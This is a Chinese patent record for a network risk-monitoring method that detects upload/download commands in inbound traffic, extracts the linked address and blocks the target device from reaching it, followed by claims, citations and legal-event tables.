附图中的流程图和框图,图示了按照本公开各种实施例的系统、方法和计算机程序产品的可能实现的体系架构、功能和操作。在这点上,流程图或框图中的每个方框可以代表一个模块、程序段、或代码的一部分,上述模块、程序段、或代码的一部分包含一个或多个用于实现规定的逻辑功能的可执行指令。也应当注意,在有些作为替换的实现中,方框中所标注的功能也可以以不同于附图中所标注的顺序发生。例如,两个接连地表示的方框实际上可以基本并行地执行,它们有时也可以按相反的顺序执行,这依所涉及的功能而定。也要注意的是,框图或流程图中的每个方框、以及框图或流程图中的方框的组合,可以用执行规定的功能或操作的专用的基于硬件的系统来实现,或者可以用专用硬件与计算机指令的组合来实现。
本领域技术人员可以理解,本公开的各个实施例和/或权利要求中记载的特征可以进行多种组合和/或结合,即使这样的组合或结合没有明确记载于本公开中。特别地,在不脱离本公开精神和教导的情况下,本公开的各个实施例和/或权利要求中记载的特征可以进行多种组合和/或结合。所有这些组合和/或结合均落入本公开的范围。
以上对本公开的实施例进行了描述。但是,这些实施例仅仅是为了说明的目的,而并非为了限制本公开的范围。尽管在以上分别描述了各实施例,但是这并不意味着各个实施例中的措施不能有利地结合使用。本公开的范围由所附权利要求及其等同物限定。不脱离本公开的范围,本领域技术人员可以做出多种替代和修改,这些替代和修改都应落在本公开的范围之内。
Claims (12)
1.一种风险监控方法,包括:
获取目标设备的第一访问数据流,其中,所述第一访问数据流包括第一设备访问所述目标设备生成的数据流;
确定所述第一访问数据流中是否包括风险信息,其中,所述风险信息与目标地址信息相关联,所述目标地址信息包括第二设备的地址信息;
响应于确定所述第一访问数据流包括所述风险信息,获取所述目标地址信息;
获取所述目标设备的第二访问数据流,其中,所述第二访问数据流包括所述目标设备访问所述第二设备生成的数据流;以及
响应于确定所述第二访问数据流中包括所述目标地址信息,禁止所述目标设备访问所述第二设备。
2.根据权利要求1所述的方法,还包括:获取预置敏感命令,所述预置敏感命令包括数据上传命令和数据下载命令中的至少一个;
其中,所述确定所述第一访问数据流中是否包括风险信息,包括:
确定所述第一访问数据流中是否包括预置敏感命令;以及
响应于确定所述第一访问数据流中包括所述预置敏感命令,确定所述第一访问数据流中是否包括所述风险信息。
3.根据权利要求2所述的方法,还包括:获取与所述预置敏感命令相匹配的提取规则;
其中,所述获取所述目标地址信息包括:
基于所述提取规则,提取所述第一访问数据流中的所述风险信息;以及
基于所述风险信息获取所述目标地址信息。
4.根据权利要求3所述的方法,其中,所述提取规则包括所要提取的信息的信息类型和提取方式;
其中,所述基于所述提取规则,提取所述第一访问数据流中的所述风险信息包括:
确定所述第一访问数据流中符合所述信息类型的风险信息;以及
基于所述提取方式,提取符合所述信息类型的风险信息。
5.根据权利要求4所述的方法,其中,所述提取方式包括参考信息和相对目标位置;
其中,所述基于所述提取方式,提取符合所述信息类型的风险信息包括:
确定所述第一访问数据流中的参考信息;以及
提取与所述参考信息处于所述相对目标位置的信息作为所述风险信息。
6.根据权利要求3所述的方法,其中,所述风险信息包括第一链接信息;
其中,所述基于所述风险信息获取所述目标地址信息包括:
确定所述第一链接信息所指向的第一目标数据;
确定存储所述第一目标数据的设备作为所述第二设备;以及
获取所述第二设备的所述目标地址信息,其中,所述目标地址信息包括域名和IP地址中的至少一个。
7.根据权利要求1~6中任意一项所述的方法,其中,所述响应于确定所述第二访问数据流中包括所述目标地址信息,禁止所述目标设备访问所述第二设备包括:
响应于确定所述第二访问数据流中包括所述目标地址信息,阻断所述目标设备访问所述目标地址信息。
8.根据权利要求6所述的方法,其中,在响应于确定所述第二访问数据流中包括所述目标地址信息,禁止所述目标设备访问所述第二设备之后,所述方法还包括:
获取合法地址信息;以及
基于所述合法地址信息更新所述目标地址信息,以便于所述目标设备访问更新后的目标地址信息。
9.根据权利要求6所述的方法,其中,在响应于确定所述第二访问数据流中包括所述目标地址信息,禁止所述目标设备访问所述第二设备之后,所述方法还包括:
获取所述目标设备所要访问的第二链接信息,所述第二链接信息指向第二目标数据,所述第二目标数据存储于所述第二设备;
获取合法链接信息;以及
基于所述合法链接信息更新所述第二链接信息,以便于所述目标设备访问更新后的第二链接信息。
10.一种风险监控装置,包括:
第一获取模块,获取目标设备的第一访问数据流,其中,所述第一访问数据流包括第一设备访问所述目标设备生成的数据流;
确定模块,确定所述第一访问数据流中是否包括风险信息,其中,所述风险信息与目标地址信息相关联,所述目标地址信息包括第二设备的地址信息;
第二获取模块,响应于确定所述第一访问数据流中包括所述风险信息,获取所述目标地址信息;
第三获取模块,获取所述目标设备的第二访问数据流,其中,所述第二访问数据流包括所述目标设备访问所述第二设备生成的数据流;以及
禁止模块,响应于确定所述第二访问数据流中包括所述目标地址信息,禁止所述目标设备访问所述第二设备。
11.一种计算设备,包括:
一个或多个处理器;
存储装置,用于存储一个或多个程序,
其中,当所述一个或多个程序被所述一个或多个处理器执行时,使得所述一个或多个处理器执行根据权利要求1~9中任一项所述的方法。
12.一种计算机可读存储介质,其上存储有可执行指令,该指令被处理器执行时使处理器执行根据权利要求1~9中任一项所述的方法。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201911424081.7A CN111212070B (zh) | 2019-12-31 | 2019-12-31 | 风险监控方法、装置、计算设备以及介质 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201911424081.7A CN111212070B (zh) | 2019-12-31 | 2019-12-31 | 风险监控方法、装置、计算设备以及介质 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN111212070A CN111212070A (zh) | 2020-05-29 |
| CN111212070B true CN111212070B (zh) | 2022-03-08 |
Family
ID=70787461
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201911424081.7A Active CN111212070B (zh) | 2019-12-31 | 2019-12-31 | 风险监控方法、装置、计算设备以及介质 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN111212070B (zh) |
Families Citing this family (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN111641721B (zh) * | 2020-06-02 | 2022-03-08 | 中国工商银行股份有限公司 | 安全检测方法、安全检测装置、计算设备以及介质 |
| CN114726559A (zh) * | 2020-12-22 | 2022-07-08 | 深信服科技股份有限公司 | 一种url检测方法、系统、设备及计算机可读存储介质 |
| CN114465819A (zh) * | 2022-03-28 | 2022-05-10 | 中国工商银行股份有限公司 | 风险信息预警方法、装置、设备及介质 |
Citations (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN106911697A (zh) * | 2017-02-28 | 2017-06-30 | 北京百度网讯科技有限公司 | 访问权限设置方法、装置、服务器及存储介质 |
| CN109040000A (zh) * | 2017-06-12 | 2018-12-18 | 北京京东尚科信息技术有限公司 | 基于ip地址的用户识别方法和系统 |
Family Cites Families (9)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US8875259B2 (en) * | 2007-11-15 | 2014-10-28 | Salesforce.Com, Inc. | On-demand service security system and method for managing a risk of access as a condition of permitting access to the on-demand service |
| US10263999B2 (en) * | 2013-03-25 | 2019-04-16 | Beijing Qihoo Technology Company Limited | System for securely accessing network address, and device and method therein |
| CN103268442B (zh) * | 2013-05-14 | 2015-12-23 | 北京奇虎科技有限公司 | 一种实现安全访问视频网站的方法和装置 |
| CN105323210A (zh) * | 2014-06-10 | 2016-02-10 | 腾讯科技(深圳)有限公司 | 一种检测网站安全的方法、装置及云服务器 |
| CN105471912B (zh) * | 2015-12-31 | 2019-01-22 | 深信服科技股份有限公司 | 监控网络的安全防御方法和系统 |
| CN108259425A (zh) * | 2016-12-28 | 2018-07-06 | 阿里巴巴集团控股有限公司 | 攻击请求的确定方法、装置及服务器 |
| CN110351248B (zh) * | 2019-06-14 | 2022-03-18 | 北京纵横无双科技有限公司 | 一种基于智能分析和智能限流的安全防护方法及装置 |
| CN110602046B (zh) * | 2019-08-13 | 2022-04-26 | 未鲲(上海)科技服务有限公司 | 数据监控处理方法、装置、计算机设备和存储介质 |
| CN110598411A (zh) * | 2019-09-23 | 2019-12-20 | 腾讯科技(深圳)有限公司 | 敏感信息检测方法、装置、存储介质和计算机设备 |
-
2019
- 2019-12-31 CN CN201911424081.7A patent/CN111212070B/zh active Active
Patent Citations (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN106911697A (zh) * | 2017-02-28 | 2017-06-30 | 北京百度网讯科技有限公司 | 访问权限设置方法、装置、服务器及存储介质 |
| CN109040000A (zh) * | 2017-06-12 | 2018-12-18 | 北京京东尚科信息技术有限公司 | 基于ip地址的用户识别方法和系统 |
Also Published As
| Publication number | Publication date |
|---|---|
| CN111212070A (zh) | 2020-05-29 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US11082436B1 (en) | System and method for offloading packet processing and static analysis operations | |
| US9973531B1 (en) | Shellcode detection | |
| US10757134B1 (en) | System and method for detecting and remediating a cybersecurity attack | |
| CN111212070B (zh) | 风险监控方法、装置、计算设备以及介质 | |
| US10445502B1 (en) | Susceptible environment detection system | |
| US10341378B2 (en) | Methods, systems, and media for inhibiting attacks on embedded devices | |
| US10581874B1 (en) | Malware detection system with contextual analysis | |
| WO2021077987A1 (zh) | 一种安全漏洞的防御方法和设备 | |
| US8732304B2 (en) | Method and system for ensuring authenticity of IP data served by a service provider | |
| US10621338B1 (en) | Method to detect forgery and exploits using last branch recording registers | |
| CN105934927B (zh) | 针对跨安全边界的sdn api调用的动态过滤 | |
| US10887340B2 (en) | Methods, systems, and media for inhibiting attacks on embedded devices | |
| US20080028464A1 (en) | Systems and Methods for Data Processing Anomaly Prevention and Detection | |
| US20140380473A1 (en) | Zero-day discovery system | |
| GB2512954A (en) | Detecting and marking client devices | |
| CN109688153B (zh) | 使用主机应用/程序到用户代理的映射的零日威胁检测 | |
| US20210192043A1 (en) | Dynamic rules engine in a cloud-based sandbox | |
| US20190109824A1 (en) | Rule enforcement in a network | |
| KR101598187B1 (ko) | DDoS 공격 차단 방법 및 장치 | |
| CN111193747B (zh) | 报文的威胁检测方法、装置、电子设备和存储介质 | |
| US20120185937A1 (en) | System and method for selectively storing web objects in a cache memory based on policy decisions | |
| CN114928564A (zh) | 安全组件的功能验证方法及装置 | |
| CN114281547B (zh) | 一种数据报文处理方法、装置、电子设备及存储介质 | |
| EP2815350A2 (en) | Methods, systems, and media for inhibiting attacks on embedded devices | |
| CN111628983A (zh) | 准入控制方法、装置、计算机设备、介质和程序产品 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant | ||
| CP01 | Change in the name or title of a patent holder |
Address after: Room 332, 3 / F, Building 102, 28 xinjiekouwei street, Xicheng District, Beijing 100088 Patentee after: Qianxin Technology Group Co.,Ltd. Patentee after: Qianxin Wangshen information technology (Beijing) Co.,Ltd. Address before: Room 332, 3 / F, Building 102, 28 xinjiekouwei street, Xicheng District, Beijing 100088 Patentee before: Qianxin Technology Group Co.,Ltd. Patentee before: LEGENDSEC INFORMATION TECHNOLOGY (BEIJING) Inc. |
|
| CP01 | Change in the name or title of a patent holder |